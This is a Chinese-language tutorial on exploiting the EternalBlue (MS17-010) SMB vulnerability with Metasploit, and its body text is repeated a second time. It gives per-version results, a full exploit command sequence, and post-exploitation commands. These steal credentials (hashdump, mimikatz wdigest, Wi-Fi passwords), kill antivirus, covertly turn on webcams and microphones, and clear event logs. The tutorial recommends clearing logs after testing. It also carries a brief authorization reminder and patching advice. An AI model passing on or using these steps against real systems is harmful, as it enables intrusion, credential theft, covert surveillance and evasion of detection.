那些年,我们追过的“蓝”
字数 2144 2025-08-29 08:32:09

永恒之蓝(MS17-010)漏洞利用全面教学文档

一、永恒之蓝漏洞概述

永恒之蓝(EternalBlue)是利用Windows SMB协议中的漏洞(CVE-2017-0144)进行攻击的漏洞利用工具,对应微软安全公告MS17-010。该漏洞影响几乎所有Windows操作系统版本,包括Windows XP到Windows 10以及对应的服务器版本。

二、Metasploit中的利用模块

目前Metasploit框架中主要有三个利用永恒之蓝漏洞的模块:

  1. exploit/windows/smb/enternalblue_doublepulsar

    • 下载地址: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit
    • 早期模块,结合了DoublePulsar后门
  2. exploit/windows/smb/ms17_010_eternalblue

    • Kali官方最早支持的模块
    • 对部分系统版本利用稳定
  3. exploit/windows/smb/ms17_010_psexec

    • 最新更新的模块
    • 下载地址: https://github.com/rapid7/metasploit-framework/pull/9473
    • 已被纳入Kali更新

三、环境准备与安装

  1. Kali Linux 2.0及以下版本需要手动安装该模块(或下载最新版Metasploit)
  2. 安装时需注意安装四个依赖模块
  3. 使用reload_all命令验证安装是否成功,确保不报错

四、各Windows版本测试结果

1. Windows Server 2003 Enterprise Edition

  • IP示例: 192.168.253.141
  • 测试结果: 多次测试中稳定利用

2. Windows XP Professional

  • IP示例: 192.168.253.136
  • 测试结果: 多次测试中稳定利用

3. Windows 7 家庭普通版

  • IP示例: 192.168.253.135
  • 注意事项:
    • 需指定SMBPass和SMBUser建立Windows命名管道
    • 使用exploit/windows/smb/ms17_010_eternalblue模块可被稳定利用

4. Windows Server 2008 R2 Datacenter

  • IP示例: 192.168.253.135
  • 注意事项:
    • 需指定SMBPass和SMBUser建立Windows命名管道
    • 使用ms17_010_eternalblue模块时:
      • 部分Server 2008可被稳定利用
      • 企业版利用不稳定,易导致蓝屏重启

5. Windows 8.1 Pro 9600/6.3

  • IP示例: 10.0.21.160
  • 测试结果:
    • Windows 8.1 Pro 9600可以稳定利用
    • 较高版本需要建立Windows命名管道

6. Windows Server 2012

  • IP示例: 192.168.253.146
  • 注意事项: 需指定SMBPass和SMBUser建立Windows命名管道

7. Windows 10

  • IP示例: 192.168.253.145
  • 测试结果:
    • 部分老版本稳定利用
    • 较新版本需指定SMBPass和SMBUser建立Windows命名管道
    • 特殊发现: Windows 10 Home 10586版本无需建立Windows命名管道即可稳定利用

五、渗透测试实用命令集

以下命令在Windows 7 x64旗舰版(未更新最新补丁)测试环境中验证:

1. 信息收集

  • post/windows/wlan/wlan_profile - 读取无线连接的账号密码
    • 如执行失败可尝试替代方法: netsh wlan show profiles
  • wdigest - 抓取明文密码(需加载mimikatz模块)
  • webcam_list - 查看是否有摄像头
  • hashdump - 获取系统哈希值

2. 系统控制

  • killav - 杀掉杀毒软件
  • vnc - 启动VNC连接
  • screenshot - 对目标系统桌面进行截屏
  • clearev - 清除系统日志

3. 多媒体控制

  • webcam - 启动摄像头
  • webcam_snap -i 1 -v false - 启动摄像头拍摄一张照片(不打开闪光灯)
  • sound_recorder - 启动声音录制

六、利用流程示例

  1. 选择适当的利用模块:

    use exploit/windows/smb/ms17_010_psexec
    
  2. 设置目标参数:

    set RHOSTS 192.168.1.100
    set SMBUser username
    set SMBPass password
    
  3. 执行攻击:

    exploit
    

七、注意事项

  1. 针对不同Windows版本需采用不同的利用策略
  2. 较新版本Windows通常需要提供有效的SMB凭据
  3. 服务器版本(特别是企业版)利用时可能导致系统不稳定
  4. 实际测试前应确保获得合法授权
  5. 测试后建议使用clearev清理日志

八、防御建议

  1. 及时安装MS17-010补丁
  2. 禁用SMBv1协议
  3. 在网络边界阻止TCP 445端口
  4. 使用强密码策略
  5. 启用Windows防火墙并配置严格规则

本教学文档涵盖了永恒之蓝漏洞利用的关键知识点,包括模块选择、各系统版本差异、实用命令集和防御措施,可作为渗透测试参考指南使用。

永恒之蓝(MS17-010)漏洞利用全面教学文档 一、永恒之蓝漏洞概述 永恒之蓝(EternalBlue)是利用Windows SMB协议中的漏洞(CVE-2017-0144)进行攻击的漏洞利用工具,对应微软安全公告MS17-010。该漏洞影响几乎所有Windows操作系统版本,包括Windows XP到Windows 10以及对应的服务器版本。 二、Metasploit中的利用模块 目前Metasploit框架中主要有三个利用永恒之蓝漏洞的模块: exploit/windows/smb/enternalblue_ doublepulsar 下载地址: https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit 早期模块,结合了DoublePulsar后门 exploit/windows/smb/ms17_ 010_ eternalblue Kali官方最早支持的模块 对部分系统版本利用稳定 exploit/windows/smb/ms17_ 010_ psexec 最新更新的模块 下载地址: https://github.com/rapid7/metasploit-framework/pull/9473 已被纳入Kali更新 三、环境准备与安装 Kali Linux 2.0及以下版本 需要手动安装该模块(或下载最新版Metasploit) 安装时需注意安装四个依赖模块 使用 reload_all 命令验证安装是否成功,确保不报错 四、各Windows版本测试结果 1. Windows Server 2003 Enterprise Edition IP示例: 192.168.253.141 测试结果: 多次测试中稳定利用 2. Windows XP Professional IP示例: 192.168.253.136 测试结果: 多次测试中稳定利用 3. Windows 7 家庭普通版 IP示例: 192.168.253.135 注意事项 : 需指定SMBPass和SMBUser建立Windows命名管道 使用 exploit/windows/smb/ms17_010_eternalblue 模块可被稳定利用 4. Windows Server 2008 R2 Datacenter IP示例: 192.168.253.135 注意事项 : 需指定SMBPass和SMBUser建立Windows命名管道 使用 ms17_010_eternalblue 模块时: 部分Server 2008可被稳定利用 企业版利用不稳定,易导致蓝屏重启 5. Windows 8.1 Pro 9600/6.3 IP示例: 10.0.21.160 测试结果: Windows 8.1 Pro 9600可以稳定利用 较高版本需要建立Windows命名管道 6. Windows Server 2012 IP示例: 192.168.253.146 注意事项 : 需指定SMBPass和SMBUser建立Windows命名管道 7. Windows 10 IP示例: 192.168.253.145 测试结果: 部分老版本稳定利用 较新版本需指定SMBPass和SMBUser建立Windows命名管道 特殊发现 : Windows 10 Home 10586版本无需建立Windows命名管道即可稳定利用 五、渗透测试实用命令集 以下命令在Windows 7 x64旗舰版(未更新最新补丁)测试环境中验证: 1. 信息收集 post/windows/wlan/wlan_profile - 读取无线连接的账号密码 如执行失败可尝试替代方法: netsh wlan show profiles wdigest - 抓取明文密码(需加载mimikatz模块) webcam_list - 查看是否有摄像头 hashdump - 获取系统哈希值 2. 系统控制 killav - 杀掉杀毒软件 vnc - 启动VNC连接 screenshot - 对目标系统桌面进行截屏 clearev - 清除系统日志 3. 多媒体控制 webcam - 启动摄像头 webcam_snap -i 1 -v false - 启动摄像头拍摄一张照片(不打开闪光灯) sound_recorder - 启动声音录制 六、利用流程示例 选择适当的利用模块: 设置目标参数: 执行攻击: 七、注意事项 针对不同Windows版本需采用不同的利用策略 较新版本Windows通常需要提供有效的SMB凭据 服务器版本(特别是企业版)利用时可能导致系统不稳定 实际测试前应确保获得合法授权 测试后建议使用 clearev 清理日志 八、防御建议 及时安装MS17-010补丁 禁用SMBv1协议 在网络边界阻止TCP 445端口 使用强密码策略 启用Windows防火墙并配置严格规则 本教学文档涵盖了永恒之蓝漏洞利用的关键知识点,包括模块选择、各系统版本差异、实用命令集和防御措施,可作为渗透测试参考指南使用。